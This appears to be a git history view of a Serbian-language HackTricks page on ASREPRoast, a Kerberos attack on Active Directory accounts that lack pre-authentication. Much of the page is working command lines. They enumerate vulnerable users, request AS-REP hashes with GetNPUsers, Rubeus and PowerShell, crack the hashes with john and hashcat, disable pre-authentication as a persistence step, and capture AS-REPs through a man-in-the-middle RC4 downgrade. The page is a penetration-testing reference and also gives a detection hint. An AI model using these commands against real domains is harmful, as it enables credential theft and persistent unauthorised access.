hacktricks/windows-hardening/active-directory-methodology/asreproast.md

111 lines
5.7 KiB
Markdown
Raw Normal View History

2022-05-08 23:13:03 +00:00
# ASREPRoast
2022-04-28 16:01:33 +00:00
ASREPRoast je sigurnosni napad koji iskorišćava korisnike koji nemaju atribut **Kerberos pre-authentication required**. U osnovi, ova ranjivost omogućava napadačima da zatraže autentikaciju za korisnika od kontrolera domena (DC) bez potrebe za korisnikovom lozinkom. DC zatim odgovara porukom koja je šifrovana ključem izvedenim iz korisnikove lozinke, koju napadači mogu pokušati da dešifruju offline kako bi otkrili korisnikovu lozinku.
2024-02-10 13:11:20 +00:00
Glavni zahtevi za ovaj napad su:
- **Odsustvo Kerberos pre-authentication-a**: Ciljni korisnici moraju imati ovu sigurnosnu funkciju onemogućenu.
- **Povezivanje sa kontrolerom domena (DC)**: Napadači moraju imati pristup DC-u kako bi slali zahteve i primili šifrovane poruke.
- **Opcioni nalog domena**: Imajući nalog domena omogućava napadačima efikasnije identifikovanje ranjivih korisnika putem LDAP upita. Bez takvog naloga, napadači moraju nagađati korisnička imena.
#### Enumeracija ranjivih korisnika (potrebne su akreditacije domena)
2024-02-10 13:11:20 +00:00
{% code title="Korišćenje Windows-a" %}
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
{% endcode %}
{% code title="Korišćenje Linux-a" %}
2024-01-18 09:40:35 +00:00
```bash
2024-02-10 13:11:20 +00:00
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
2024-01-18 09:40:35 +00:00
```
#### Zahtevaj AS_REP poruku
2024-02-10 13:11:20 +00:00
{% code title="Korišćenje Linuxa" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% endcode %}
{% code title="Korišćenje Windows-a" %}
```bash
2022-08-15 13:00:19 +00:00
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
2022-08-15 13:00:19 +00:00
{% hint style="warning" %}
AS-REP prženje sa Rubeusom će generisati 4768 sa vrstom šifrovanja 0x17 i vrstom preautentikacije 0.
2022-08-15 13:00:19 +00:00
{% endhint %}
### Krekovanje
2024-02-08 03:08:28 +00:00
```bash
john --wordlist=passwords_kerb.txt hashes.asreproast
2024-02-10 13:11:20 +00:00
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
2024-02-10 13:11:20 +00:00
### Upornost
Prisilite **preauth** da nije potreban za korisnika za koga imate dozvole **GenericAll** (ili dozvole za pisanje svojstava):
{% code title="Korišćenje Windows-a" %}
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
{% endcode %}
{% code title="Korišćenje Linux-a" %}
2024-01-18 09:40:35 +00:00
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
```
## ASREProast bez pristupnih podataka
Napadač može koristiti poziciju čoveka u sredini da uhvati AS-REP pakete dok prolaze kroz mrežu <ins>bez oslanjanja na onemogućenu Kerberos preautentikaciju.</ins> Stoga ova tehnika funkcioniše za sve korisnike na VLAN-u.<br>
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) nam omogućava da to uradimo. Štaviše, alat <ins>prisiljava klijentske radne stanice da koriste RC4</ins> izmenom Kerberos pregovora.
```bash
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP
# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing
# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
```
2024-02-10 13:11:20 +00:00
## Reference
2023-03-05 19:54:13 +00:00
2024-02-08 03:08:28 +00:00
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
***
2022-04-28 16:01:33 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
2024-02-10 13:11:20 +00:00
Pridružite se [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!
2023-03-05 19:54:13 +00:00
**Hakerski uvidi**\
2024-02-10 13:11:20 +00:00
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja
2023-02-27 09:28:45 +00:00
**Vesti o hakovanju u realnom vremenu**\
2024-02-10 13:11:20 +00:00
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu
2023-02-27 09:28:45 +00:00
**Poslednje najave**\
Budite informisani o najnovijim nagradama za pronalaženje bagova i važnim ažuriranjima platformi
2023-02-27 09:28:45 +00:00
2024-02-10 13:11:20 +00:00
**Pridružite nam se na** [**Discord-u**](https://discord.com/invite/N3FrSbmwdy) i počnite da sarađujete sa vrhunskim hakerima danas!
2022-11-05 09:07:43 +00:00
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Naučite hakovanje AWS-a od početnika do stručnjaka sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2024-01-02 18:28:27 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
2022-04-28 16:01:33 +00:00
</details>